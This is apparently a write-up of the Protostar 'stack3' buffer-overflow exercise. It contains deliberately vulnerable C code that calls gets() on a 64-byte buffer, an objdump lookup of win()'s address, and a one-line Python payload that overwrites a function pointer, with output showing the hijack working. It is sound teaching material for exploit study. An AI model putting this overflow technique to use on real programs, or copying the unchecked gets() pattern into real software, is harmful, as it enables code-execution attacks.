Stack 3

Stack 3 source

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

We have to find the address of the win function in the text segment. To do this we use objdump.

objdump -S stack3 | grep win

Output:

08048424 <win>:

Now we need to write the address 0x08048424 into the function pointer.

print( "A"*64+"\x24\x84\x04\x08")

Finally, to feed the exploit to the program we run:

python stack3.py | /opt/protostar/bin/stack3

And we get an output of

calling function pointer, jumping to 0x08048424
code flow successfully changed